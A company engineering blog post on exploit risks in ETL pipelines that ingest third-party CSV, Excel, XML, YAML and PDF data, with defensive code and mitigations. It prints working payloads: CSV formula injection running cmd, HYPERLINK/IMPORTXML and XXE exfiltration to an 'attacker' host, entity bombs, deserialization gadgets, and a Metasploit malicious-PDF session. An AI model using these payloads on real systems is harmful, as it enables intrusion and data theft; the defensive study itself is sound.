Beware of Exploits in ETL

Boris Reitman
Apr 27, 2021

At my company we receive data from third-party vendors. This data comes in various formats: XML, CSV, Excel, PDF, and JSON, and we use an Extract-Transform-Load (ETL) process to store the data in our database. This kind of ETL process is used by many organizations that ingest data from external sources. What are the security considerations pertaining to this process?

The security issue is that a third party may unintentionally provide data laden with exploits. This can happen if the third party accumulates but does not filter free-form data submitted by its users. Such data may include names, street addresses, or free-form descriptions. The exploits are innocuous at rest but become weaponized once the data is extracted for manual viewing.

For instance, if a cell in a CSV file starts with an equal sign (=), then Excel interprets the cell as a formula to be executed. Consider this CSV:

Date,First Name,Last Name
2020-07-25,John,Smith
2020-07-25,Marry,Poppins
2020-07-25,"=2+5", Math

Unfortunately, quotes around the cell value do not neutralize this effect. Both the Apple Numbers and Microsoft Excel apps would render the rogue cell as “7” despite the quoted "=2+5". Besides the equal sign, the following characters can also trigger formula evaluation: +, -, @.

The formulas also allow running external commands in the underlying operating system. For example, each of these CSV lines would trigger opening the external calculator program calc.exe:

...,=DDE("cmd";"/C calc";"__DdeLink_60_870516294"),...
...,=cmd|' /C calc'!A0,...
...,"=2+5+cmd|' /C calc'!A0",...
...,@SUM(cmd|'/c calc' !A0),...

There would be warnings from Excel before running external commands, but attackers rely on users’ tendency to ignore security warnings in files downloaded from trusted sources.

Special functions that create hyperlinks allow attackers to steal data from a CSV file. If a CSV file contains the following value in a cell, then upon opening it in Excel a user would see a link with the text “Error: please click for further information” in the corresponding cell inside the app. Upon clicking the link, he would submit the contents of cells A10 and A11 to the attacker. Those cells may contain sensitive information, such as payment details.

...,=HYPERLINK("http://attacker?leak="&A10&A11,"Error: please click for further information"),...

The Google Sheets web app is not immune to such attacks either. For instance, the IMPORTXML(url, xpath) function fetches data from the provided URL and inserts it into the current sheet. Consider what would happen when importing the following CSV into Google Sheets:

...,"=IMPORTXML(CONCAT(""http://attacker?v="", CONCATENATE(A2:E2)), ""//a"")",...

The result would be that data in the 2nd row of the spreadsheet spanning cells A2 through E2 would be submitted to the attacker.

But it gets worse. The URL could also be another spreadsheet in your account. By using this technique twice the attacker can exfiltrate data from any other spreadsheet in your Google Docs account if he knows its URL.

A suggested workaround for these attacks is to prefix a tab character to every CSV cell that begins with one of the special characters =, +, -, @. This neutralizes the attacks when viewing the data in Excel and other spreadsheet apps. Note, however, that the data is then no longer in its original form.
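The workaround can be sketched in Python as follows. This is a minimal illustration, assuming the report is written with the standard csv module. The helper names neutralize_cell and write_safe_csv are hypothetical.

```python
import csv
import io

# Characters that spreadsheet apps may treat as the start of a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@")


def neutralize_cell(value):
    """Prefix a tab to string cells that begin with a formula trigger."""
    if isinstance(value, str) and value.startswith(FORMULA_TRIGGERS):
        return "\t" + value
    return value


def write_safe_csv(rows, out):
    """Write rows to a file-like object, neutralizing every cell first."""
    writer = csv.writer(out)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])


buffer = io.StringIO()
write_safe_csv([["2020-07-25", "=2+5", "Math"]], buffer)
```

Note that a legitimate string value such as "-5" is prefixed as well, which is one more way in which the exported data departs from its original form.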

PDF files are also widely used to export reports from administrative websites. If you use libraries like tabula-py to extract CSVs from such PDFs, then the extracted data can contain the exploits mentioned earlier.

Full control of data file generation

So far we have looked at the situation in which data contains latent exploits in a regular data file. However, if an attacker can manufacture a data file in full, then he can do far more damage. The challenge for him, however, is to deliver such a file to the victim.

If you receive data files from third parties, then a failure to authenticate the sender exposes you to phishing attacks. If you are receiving data files by email, you may be getting them from an impostor. If you are receiving files by submission to your API, ensure that the third party is using an authentication token. If you are downloading data from a third party, verify its SSL certificate even if the third party is using a self-signed one. (For tips on how to do that, read our earlier Smarking blog post.)
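One way to verify a self-signed certificate is to pin its fingerprint. The sketch below is an illustration under assumptions rather than a complete client: it assumes the vendor has given you the SHA-256 fingerprint of its certificate over a separate trusted channel, and the function names are hypothetical.

```python
import hashlib
import hmac
import socket
import ssl


def fingerprint(der_cert: bytes) -> str:
    """Return the SHA-256 fingerprint of a DER-encoded certificate as hex."""
    return hashlib.sha256(der_cert).hexdigest()


def matches_pin(der_cert: bytes, expected_hex: str) -> bool:
    """Compare a certificate with a fingerprint obtained out of band."""
    normalized = expected_hex.replace(":", "").lower()
    return hmac.compare_digest(fingerprint(der_cert), normalized)


def fetch_server_cert(host: str, port: int = 443) -> bytes:
    """Fetch the server certificate without CA validation.

    The caller must check the result with matches_pin before trusting it.
    """
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=10) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert(binary_form=True)
```

In practice the pin should be checked on the same connection that performs the download. An alternative is to pass the vendor's certificate file as the cafile argument of ssl.create_default_context, so that the usual validation runs against that certificate alone.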

The attacker can also gain control of the data file generation code. This can be accomplished by poisoning public code repositories. The simplest of such attacks is publishing misspelled variants of popular packages in the hope that users install them by accident. For instance, in 2018 a researcher found a malicious package ‘dajngo’ in Python’s PyPI repository, an intentional misspelling of the popular package ‘django.’

By infecting generated data files rather than the system hosting malicious code the attacker delays detection. A malicious data file can introduce a discrepancy into ETL which may be manually reviewed only weeks later. The malicious data file would be downloaded and opened by the victim, thereby infecting his system. Thus, API exploits can infect hundreds if not thousands of API consumers until the issue is identified at the API source. Each infection could open a reverse tunnel to the attacker creating a pivot for further network infiltration.

Excel files

Much like CSV files, Excel files are subject to formula-based exploits, but they also give attackers additional tricks. A single Excel file can encode multiple worksheets, some of which may be hidden. Excel files can also specify the font size and font color of particular cells, and this feature can be used to hide values by using a white font. Each cell also has a specific data type associated with it.

Since version 4.0, Excel has supported a more powerful kind of macro, known as XL4 macros. While standard formulas are limited to workbook-related calculations, XL4 macros allow extensive, Turing-complete programming. In order to work, they must reside on a macro-enabled sheet.

There are other behavioral differences between a CSV and an Excel file. An Excel file automatically opens in the Excel app when double-clicked, but a CSV file opens in the default spreadsheet app on the user’s system (for example, the Numbers app on a Mac). Excel files may also come from an older version of Excel, in which case the installed Excel app would attempt to import them. This variety of behaviors creates a larger attack surface for Excel data files than for CSV files.

Security at VMware surveyed XL4 exploits in the wild and presented a report in November of 2020. They demonstrate how the macros can be used to download files from the internet, to execute PowerShell scripts, and to change the Windows registry.

The XL4 macro sequence begins to run from a cell immediately under a cell labeled Auto_Open and descends lower and lower until there are no more cells with commands. A =GOTO statement can direct the program flow to any cell. Combined with FORMULA.FILL which can write any value into a cell (including an = command), the GOTO can be directed to jump to a dynamic location. This allows you to implement flow control such as loops and if statements, making the attacker's script Turing complete.

The attackers can obfuscate their code so that it does not look like a program. The GOTO jumping function can be used to obfuscate code by scattering it all over the spreadsheet, including cells not in view. White font can make the cells appear blank. Dynamic code can be generated at run-time by deobfuscating data in cells and converting them into code. Code can also be downloaded from the Internet at runtime, then pasted into a temporary cell and executed.

As stated earlier, in order for the XL4 macros to work they must reside on a macro-enabled sheet. Security measures are already in place to alert about the presence of such sheets. However, an attacker can prepare an Excel file without the macro designation and try to trick the user into enabling it manually. For instance, this kind of Excel document was observed in the wild:

[Image: phishing page]
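Before a workbook from a vendor is opened in Excel, its package can be inspected from a script. The following Python sketch is a rough triage only. It assumes the modern zip-based format (.xlsx or .xlsm), assumes that XL4 macro sheets are stored under xl/macrosheets/ and that hidden sheets are marked with a state attribute in xl/workbook.xml, and it does not cover the legacy binary .xls format. The function name inspect_xlsx is hypothetical.

```python
import io
import re
import zipfile

# Matches <sheet ...> entries marked as hidden in xl/workbook.xml.
HIDDEN_SHEET = re.compile(r'<sheet\b[^>]*\bstate="(?:hidden|veryHidden)"[^>]*>')


def inspect_xlsx(data: bytes) -> dict:
    """Report macro sheets, VBA projects and hidden sheets in a workbook."""
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        names = archive.namelist()
        workbook = archive.read("xl/workbook.xml").decode("utf-8", "replace")
    return {
        "macro_sheets": [n for n in names if n.startswith("xl/macrosheets/")],
        "vba_project": any(n.endswith("vbaProject.bin") for n in names),
        "hidden_sheets": len(HIDDEN_SHEET.findall(workbook)),
    }
```

A plain text search is used instead of an XML parser so that the check itself does not parse untrusted XML. Any non-empty finding is a reason to route the file to manual review in an isolated environment.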

XML, JSON and YAML

XML files can be exploited using Document Type Definitions (DTDs). A DTD is introduced by a declaration like <!DOCTYPE html> and can declare external entities, which cause XML parsers to load files from the file system and to generate HTTP requests. For instance, the following XML file instructs the parser to load a local file and insert it into the document's own body:

<!DOCTYPE external [
<!ENTITY ee SYSTEM "file:///PATH/TO/simple.xml">
]>
<root>&ee;</root>

If the attacker could trigger an error that the XML parser reports back to him, then the contents of the file might be included in the error message, thereby leaking data to the attacker. Changing the entity's URL from the file:// scheme to an address such as http://example.com/foo.xml would instead load a remote file from the Internet.

Using these techniques, an attacker could steal data or perform a Server-Side Request Forgery (SSRF) attack to bypass firewalls. The following XML and DTD combination sends the contents of the /etc/passwd file to the attacker:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker/evil.dtd">
%dtd;
]>
<root>&send;</root>

where the evil.dtd file is:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://example.com/?%file;'>">
%all;

The attacker can also mount a denial-of-service attack by making the parser load a large file:

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY file SYSTEM "http://attacker/huge.xml" >
]>
<root>&file;</root>

Entity expansions can be used to occupy gigabytes of memory using a short XML document. The following scheme expands to an amount of memory that grows exponentially with the number of lines used:

<!DOCTYPE xmlbomb [
<!ENTITY a "1234567890" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;">
]>
<bomb>&d;</bomb>
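The growth can be checked with simple arithmetic: entity a holds 10 characters, and each further level repeats the previous one 8 times, so d expands to 10 × 8 × 8 × 8 = 5,120 characters. The Python sketch below computes the expanded size without performing the expansion. The dictionary of entity bodies mirrors the example above, and the function name expanded_length is hypothetical.

```python
import re

ENTITY_REF = re.compile(r"&(\w+);")


def expanded_length(name, entities, cache=None):
    """Length of entity `name` after full expansion, without expanding it."""
    cache = {} if cache is None else cache
    if name not in cache:
        body = entities[name]
        # Characters that are not part of an entity reference.
        literal = len(ENTITY_REF.sub("", body))
        nested = sum(
            expanded_length(ref, entities, cache)
            for ref in ENTITY_REF.findall(body)
        )
        cache[name] = literal + nested
    return cache[name]


entities = {
    "a": "1234567890",
    "b": "&a;" * 8,
    "c": "&b;" * 8,
    "d": "&c;" * 8,
}
print(expanded_length("d", entities))  # 5120
```

Continuing the same pattern to ten levels would give 10 × 8^9 characters, or about 1.3 GB, from a document of roughly a dozen lines.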

Many XML processing libraries can parse gzip compressed streams. Some of these libraries are also vulnerable to compression bombs (1GB of zeros can be compressed to a 1MB data stream).

In addition, XML parsers have vulnerabilities that are triggered by malformed XML documents. For instance, a large number of unclosed nested XML tags, as shown below, can exhaust the computer’s resources.

<A1>
<A2>
<A3>
...
<A30000>

Unfortunately, many XML libraries across various languages do not defend against such attacks by default. For example, the Python lxml library would dutifully load a local file from the filesystem, and the xmlrpc library would be subject to the memory blowup attack. However, specialized libraries such as defusedxml handle such attacks correctly. Use these libraries when working with untrusted data.

If you are writing an XML parser yourself, use the following guidelines to limit the attack surface: limit parse depth, limit parse time, skip DTDs, and do not expand entities. Also, do not run XPath expressions or apply XSL transformations received from untrusted sources.
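Some of these guidelines can be illustrated with Python's standard library. The sketch below is an assumption-laden example, not a replacement for a hardened library: it uses the expat bindings to reject any document that declares a DTD (which also rules out custom entities) and to cap the nesting depth, and it does not limit parse time. The names UnsafeXML, check_xml, and parse_untrusted are hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised when a document uses a feature this sketch refuses to process."""


def check_xml(data: bytes, max_depth: int = 100) -> None:
    """Reject documents that declare a DTD or nest deeper than max_depth."""
    depth = 0

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXML("DTD declarations are not allowed")

    def on_start(tag, attrs):
        nonlocal depth
        depth += 1
        if depth > max_depth:
            raise UnsafeXML("element nesting exceeds %d levels" % max_depth)

    def on_end(tag):
        nonlocal depth
        depth -= 1

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.Parse(data, True)


def parse_untrusted(data: bytes) -> ET.Element:
    """Run the checks first, then build the tree with the standard parser."""
    check_xml(data)
    return ET.fromstring(data)
```

The document is scanned twice, which keeps the sketch short at the cost of some speed. Malformed input that passes the checks still raises the parser's own error.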

Many API interfaces expect and return data in JSON or XML formats which contain records as key-value maps. The records are then stored in a database. Whenever the records are exported from the database into a CSV report for analysis, the resulting files can lead to the attacks that we have already seen.

Rogue content can get into JSON and XML through an injection attack. This attack is similar to the familiar SQL injection but it operates on JSON and XML. The following would be an unsafe way to build a JSON document containing a password:

json = `{..., "password":"${password}"}`

That is because a password can have quotes, commas, and colons inside it, arranged to generate new keys in the resulting JSON. Instead, use a library that would properly escape values.
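The difference can be demonstrated in Python with the standard json module. The user name and the crafted password below are made-up values for illustration.

```python
import json

# A crafted "password" that closes its own string and adds new keys.
password = 'x","admin":true,"note":"'

# Unsafe: string interpolation lets the value break out of its quotes.
unsafe = '{"user":"bob","password":"%s"}' % password

# Safe: the serializer escapes quotes and other special characters.
safe = json.dumps({"user": "bob", "password": password})

print(json.loads(unsafe))  # contains an injected "admin" key
print(json.loads(safe)["password"] == password)  # True
```

With the interpolated version the attacker gains an extra "admin" key, while the serialized version round-trips the password unchanged.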

Many languages have libraries to save, or serialize, objects into JSON, XML, and YAML files and then to restore them later in a process called “deserialization.” By design, this means that data files embed the names of the objects’ types and the objects’ states. Thus, if an attacker can cause rogue data to be deserialized, he may gain remote code execution. For instance, loading the following YAML document with Python’s yaml.load and an unsafe loader would create a new object of type Foo with its name attribute set to “Bar” (yaml.safe_load refuses such tags):

!!python/object:__main__.Foo {name: Bar}

Python’s YAML library is one of many data loaders that have a secondary ability to deserialize objects. A 2017 study [Bechler] cataloged dozens of Java libraries vulnerable to such deserialization attacks. The study reported that when the following file is parsed by Java’s XMLDecoder, it creates the attacker-specified object and calls a method on it. In this example, a ProcessBuilder object is created first, and its start method then runs the external command /usr/bin/gedit:

<new class="java.lang.ProcessBuilder">
<string>/usr/bin/gedit</string>
<method name="start" />
</new>

The same study also showed that a vulnerability in Apache Camel’s SnakeYAML component (CVE-2017-3159) allowed an attacker to run arbitrary scripts inside Java’s ScriptEngine object:

!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker/"]
]]
]

PDF Files

Much like MS Office files, PDF files are notorious delivery vehicles for exploits. For instance, last September a use-after-free bug was discovered in a cache data structure used by Adobe Reader. It led to the code execution exploit CVE-2020-9715.

PDF files have a large attack surface. They can contain JavaScript in order to power PDF-based forms. Also, the PDF standard allows embedding arbitrary file attachments, making a PDF document equivalent to an uncompressed “zip” file. Using such attachments, the attacker can easily embed exploit payloads inside the PDF and then extract them using a small amount of embedded JavaScript. For instance, the CVE-2018-8414 exploit used this technique to embed XML files into a PDF.

It is simple to embed files inside a PDF. The following command attaches a file data.bin containing raw binary data to page 27 of a PDF document:

$ pdftk manual.pdf attach_files data.bin to_page 27 output manual_plus.pdf

For security reasons, modern PDF readers do not automatically execute embedded JavaScript scripts. But in 2010 the security researcher Didier Stevens found that it is possible to launch an external program with a /Launch /Action command sequence and thereby gain code execution in the host operating system. Acrobat Reader showed a warning, but Didier found a way to alter the message text in order to trick users into ignoring it.

You can replicate Didier’s technique using Metasploit, a security researcher’s tool which attackers also use. Didier’s technique was implemented as the Metasploit module adobe_pdf_embedded_exe_nojs, whose documentation states:

This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack. [It] does not require JavaScript to be enabled and … [the] EXE is embedded in the PDF in a non-standard method using HEX encoding. Target: Adobe Reader <= v9.3.3 (Windows XP SP3 English)

Although this particular exploit is non-viable for current versions of PDF readers, the approach can be reused in future exploits. In addition, Metasploit has other PDF exploits:

> search type:exploit platform:windows name:pdf
... exploit/windows/fileformat/foxit_reader_uaf ... 2018-04-20

A possible defense from PDF exploits is to preprocess all untrusted PDF files and strip everything but the static content inside the PDF. This can be accomplished with the following GhostScript command:

$ gs -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOUTPUTFILE=clean.pdf original.pdf

Note that any copyable text inside the PDF would remain copyable. A discussion on StackOverflow suggests adding options to downsample any embedded images in order to remove exploits that utilize flaws in image processing libraries.

A simple text search inside the PDF file would not find all suspicious active components because attackers obfuscate them. Instead, one can use Didier’s tool pdfid to triage PDF documents and to analyze the suspicious ones with his pdf-parser tool.
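One obfuscation that defeats a plain text search is the hex escape in PDF names: a name such as /J#61vaScript is equivalent to /JavaScript. The Python sketch below shows the idea of decoding names before counting them. It is a rough illustration and not a substitute for pdfid: it does not look inside compressed streams, and byte sequences inside binary streams can produce false positives. The list of names is taken from the pdfid output shown later in this article, and the function names are hypothetical.

```python
import re

SUSPICIOUS_NAMES = ("JS", "JavaScript", "AA", "OpenAction", "Launch", "EmbeddedFile")
NAME_TOKEN = re.compile(rb"/([A-Za-z0-9#]+)")
HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name(raw: bytes) -> str:
    """Undo #xx hex escapes, which can be used to disguise PDF names."""
    decoded = HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
    return decoded.decode("latin-1")


def count_suspicious(pdf_bytes: bytes) -> dict:
    """Count occurrences of suspicious names after decoding hex escapes."""
    counts = dict.fromkeys(SUSPICIOUS_NAMES, 0)
    for match in NAME_TOKEN.finditer(pdf_bytes):
        name = decode_name(match.group(1))
        if name in counts:
            counts[name] += 1
    return counts
```

Files with non-zero counts for names like Launch or OpenAction are candidates for closer analysis.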

The following example shows how to generate a malicious PDF and then neutralize it:

$ msfconsole
msf6 > use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) > set lhost 1.2.3.4
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) > set filename malicious.pdf
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) > exploit
...
$ gs -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOUTPUTFILE=clean.pdf malicious.pdf
$ python pdfid.py malicious.pdf > malicious.txt
$ python pdfid.py clean.pdf > clean.txt
$ diff --width 80 --side-by-side malicious.txt clean.txt
PDFiD 0.2.7 malicious.pdf   | PDFiD 0.2.7 clean.pdf
PDF Header: %PDF-1.5        | PDF Header: %PDF-1.7
obj 5                       | obj 7
endobj 5                    | endobj 7
stream 0                    | stream 2
endstream 0                 | endstream 1
xref 1                        xref 1
trailer 1                     trailer 1
startxref 1                   startxref 1
/Page 1(1)                  | /Page 1
/Encrypt 0                    /Encrypt 0
/ObjStm 0                     /ObjStm 0
/JS 0                         /JS 0
/JavaScript 0                 /JavaScript 0
/AA 0                         /AA 0
/OpenAction 1(1)            | /OpenAction 0
/AcroForm 0                   /AcroForm 0
/JBIG2Decode 0                /JBIG2Decode 0
/RichMedia 0                  /RichMedia 0
/Launch 1(1)                | /Launch 0
/EmbeddedFile 0               /EmbeddedFile 0
/XFA 0                        /XFA 0
/Colors > 2^24 0              /Colors > 2^24 0

Final Thoughts

We have seen that the attack surface of data processing libraries differs from the attack surface of data viewing applications. There is a fundamental difference between data for machines and data for people. We have also seen that if the attacker can fully control the data file creation, then he can cause much more damage.

When working with data received from a third party it is not known how well the third party checks data submitted by its users. The first step to protect yourself from exploits is to drop superfluous elements from a third party’s data during the transformation stage of the ETL process. For instance, if fields titled “Description” and “Street Address” are not needed, then they can be filtered out on import.

Filter out unnecessary characters from fields. A street address does not need to have =, +, @ characters, and most data values never need to begin with those characters. When exporting data from your own database into CSV and PDF reports for manual viewing, simplify the data by removing all unusual characters since the report need not have data in the precise original form.
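The two filtering steps above can be sketched as a transformation function in Python. This is a minimal example under assumptions: the field names in KEEP_FIELDS and the set of permitted characters are hypothetical and would need to be adapted to the actual data.

```python
import re

# Hypothetical allowlist: only the fields the downstream analysis needs.
KEEP_FIELDS = {"date", "first_name", "last_name"}

# Anything other than letters, digits, whitespace and . , ' - is dropped.
DISALLOWED = re.compile(r"[^\w\s.,'-]")


def clean_value(value):
    """Remove unusual characters and any leading '-' from string values."""
    if not isinstance(value, str):
        return value
    cleaned = DISALLOWED.sub("", value)
    return cleaned.lstrip("-\t ").rstrip()


def transform(record: dict) -> dict:
    """Keep only allowlisted fields and clean their values."""
    return {
        key: clean_value(value)
        for key, value in record.items()
        if key in KEEP_FIELDS
    }
```

For example, a record whose first_name is "=2+5+cmd|' /C calc'!A0" comes out with the harmless value "25cmd' C calc'A0", and a "description" field is dropped entirely. Hyphens inside a value, as in a date, are preserved, but a string such as "-5" loses its sign, so numeric fields should be converted to numbers before this step.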

Anonymize datasets to remove Personally Identifiable Information (PII). This further reduces the attack surface because any user-submitted values are replaced by anonymized equivalents.

Finally, use virtual machines when opening unsafe files. VirtualBox or remote instances on AWS can be used for working with unsafe data files. As of 2021, AWS supports both Windows and macOS virtual workstations. Running ETL jobs in Docker also helps contain exploits so that they do not escape into the underlying operating system.

At my company, we ingest millions of records from parking vendors and we use such techniques to fend off exploits.

Additional Reading

  • [Mauer] “The Absurdly Underestimated Dangers of CSV Injection,” George Mauer, 2017
  • OWASP, “XML Security Cheat Sheet”
  • [Bechler] “Java Unmarshaller Security: Turning your data into code execution,” Moritz Bechler, 2017
